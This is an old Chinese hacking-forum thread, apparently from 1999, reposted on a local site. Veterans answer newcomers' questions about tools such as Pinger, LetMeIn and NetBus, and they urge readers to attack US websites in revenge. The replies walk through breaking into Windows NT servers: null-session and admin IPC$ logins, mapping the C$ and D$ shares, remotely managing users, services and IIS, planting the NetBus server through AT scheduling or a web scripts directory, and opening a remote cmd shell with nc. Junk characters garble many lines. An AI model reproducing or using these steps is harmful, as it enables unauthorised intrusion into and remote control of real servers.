《版主页黑客工具和文章的几个问题》中提到:! p/ t6 F( T! m3 K9 ]8 t
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
, W1 H2 `- Q% ~$ P* O, N> 我的机子MMX166,WIN98,2。5G,32M内存。- @7 [3 i- T9 {! i7 u* u; n2 b }' g
, f" e! y0 ~0 ?/ T/ Q黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
" q( J6 e7 p; t! r$ z你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。/ D' M; z* s/ x u
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
: J& ~& z$ s8 I; q, M* a+ a* q- H: J' _net use \\111.111.111.111\ipc$ "" /user:""
# p# Y- l7 M3 P4 F/ v0 Rnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:+ ]/ { K6 L) B( E* T( e
net view \\111.111.111.111
7 H. {3 x, `9 ~- _- o8 Y# n当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
" l8 s" |; W2 T9 T1 A: Unet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"# L2 s8 `' q s! ^( p9 b! v
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:+ T+ j4 r* @+ y, l3 L* f
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
2 J' n( G" ?7 |/ |net use x: \\111.111.111.111\c$( U5 M4 A" W( j& E
net use y: \\111.111.111.111\d$) L8 V7 b8 a6 d' c
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...) C- ^6 V3 {3 W- K" b5 l
2、管理目标NT的用户:: o) ?: L' w7 L) {$ [1 e% n c
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”* ^6 U$ Y9 [: l6 d' T" h. N( ]
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样+ L7 {1 ^6 G |2 E+ e- L
3、管理目标NT的服务( T3 l( Q( O& \& n- d W
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
5 p2 l, U6 p1 N3 |1 \这样你可以管理目标NT上的服务,共享目录; v( @* Q9 t( n( k0 Y) [
4、IIS管理+ g0 X8 d1 U' W1 j$ X. T/ T
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.1119 ^* v' q, A3 |
目标NT的FTP、WWW服务你就可以重新配置
1 r$ u& A1 O; b5、事件管理! V5 V6 A( W& G) C3 [& b
“事件查看器”->连接到服务器->111.111.111.111
9 s, i' a$ a9 [. n5 v4 d; V$ E& ]! W/ r4 |! W
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。; h' n/ h0 W8 J' m
6 x( [: G; ?- p& B/ a, h
当然,98,95也能做一些事情,但很麻烦,比如:
0 |# z: e0 a% ]2 Q0 lnet use \\111.111.111.111\ipc$8 x/ ~/ z/ I% i+ }: k
net use z: \\111.111.111.111\d$/ T& v3 F' c2 Y& e% b* H
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等1 c0 C) B* T) l) V# @2 l
! x: g# o+ X! P' C4 o. b7 @我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!+ \! ^5 p2 H/ t) d; F1 H- `
这样,你还可以了解目标机器上能有什么东东供你去用!5 w- v% }3 T+ U7 Z5 b, h4 I
" |2 |: ]+ _5 m9 x# m, f0 E
7 |5 @ K* [( O6 z
--------------------------------------------------------------------------------* c2 U0 ^ ]" n+ Z
. E. z2 V0 u% i, t
>quack于1999-06-12,23:37:44
. O/ W1 k- E1 G在大作《几个有关黑的问题》中提到:* s. R8 L$ G y
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
* J8 U& }" x) K! h6 w/ F0 T
5 H% X+ }( S0 _# f/ z# Zkillusa于1999-06-13,03:25:15
, h- m# h6 g* K2 [在大作《Re: 几个有关黑的问题》中提到:- \& \8 Y; d& @4 j/ M: ]7 K
$ K' t0 l9 @, B1 m* d" {
letmein.exe 暂时没有mypwd参数,十分抱歉
& v- Z+ ]3 y' ?pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
/ `6 U: _. h' z t5 y& H5 J: ~. L1 t+ {, Z, }
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的1 Z9 G- f$ ^1 T/ f. T: D
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
( o7 H# e* d+ z# v" y5 {2 j% y! l
/ D/ N# @9 m. K4 a- z6 i1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
1 r N% }! d( N% |, y5 m" I% r; Y& G8 e1 E; V* w- C* A- ` I
C:\>net start schedule3 U0 B9 U' b4 J1 e
Schedule 正在启动服务.....
5 n! y8 s9 o$ P- xSchedulw 服务启动成功。, M# d5 g v' t
C:\>at /?8 x K4 Q& @0 b. J
AT 命令排定在特定的日期和时间运行某些命令和程序。
* }+ a$ Z; N3 [, s! R% J' b- y9 ?运行 AT 命令之前必须先启动 Schedule 服务。# Z) c* I; @7 p/ {
; z( j4 h) N8 k7 X1 }
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
! d# V; S/ v6 O! } @$ B; }7 c9 zAT [\\computername] time [/INTERACTIVE]
+ Z) Y5 H e( [ a% U/ D[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
c/ O5 L" v8 S4 |, U9 K6 V* u# ~+ ~
\\computername 指定远程计算机。 如果省略这个参数, ~, c6 J" h& r; a! W- y
命令会被排定在本机上运行。- d' U) H: V' Q% N, G
id 指定给排定进度命令的识别号。3 I! u' \& p2 \* R
0 D+ S$ F: U+ ^
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。; B* e1 T. Y/ X- Z
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。# O7 @7 F3 I# u2 t+ O
time 指定命令运行的时间。
1 J. r3 d* ?2 g/interactive 允许作业在运行时,与用户通过桌面交互。
) |0 A. q1 g" }5 j0 l* R, h& I8 J' c- X: V" H
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。) ?4 X6 X- o7 g0 w+ |; E7 W
如果省略日期,则默认为在每月的本日运行。0 M/ \3 z, u: r2 o/ H# l
, w G9 D1 t6 }2 [1 ?/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。" }, h b- N A& Y; x$ B$ i6 c0 i7 a
1 i5 y% h. z$ i+ l2 R
"command" 准备运行的 Windows NT 命令或批处理文件。
* i* s3 j0 d! J) S. |# T' v* K: e# d+ B% d3 F* r
C:\>
6 w$ h2 H1 {* c
( A8 R1 F( @9 O知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:9 `% h6 ^3 L1 M, f4 \
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
6 R8 m% l2 l) r# y2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
$ d9 q- R# ~, K/ P3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:: h. U/ ~ i& `3 H$ o* ~ K
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
3 k% m6 q7 O8 f$ J% q- z其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:9 W# ?4 l3 O, T" x4 G; j
Microsoft(R) Windows NT(TM)
5 E& S3 \- b2 N9 g& d4 E(C) Copyright 1985-1996 Microsoft Corp.0 I' X$ y. v7 s' _( W
C:\>1 y# Z6 L5 o: j: Z
, p* v8 \% r3 n2 i# ~! |2、利用web启动ntsrv.exe或其他程序在目的服务器
, Y4 f3 g7 m; l4 ?
H* c9 B) v& P! T% W将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
1 y% J; {. {1 E! i$ ^7 \( xhttp://x.x.x.x/scripts/ntsrv.exe /port:64321( u' e% Z8 i9 O" M
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321% w, Y) _ b& ~; o
该程序就启动了
" w9 X7 D ]8 K- u8 Q8 ?2 J+ u7 A, v( E! a" i7 s! T0 w
我只提这几中方法!& J% |% o5 w1 U
要成功,必须打好基础工,对操作系统充分了解!
! r- L- n# y( [9 Z* N: _3 G. N, j: R7 D
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-13 17:03:28
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡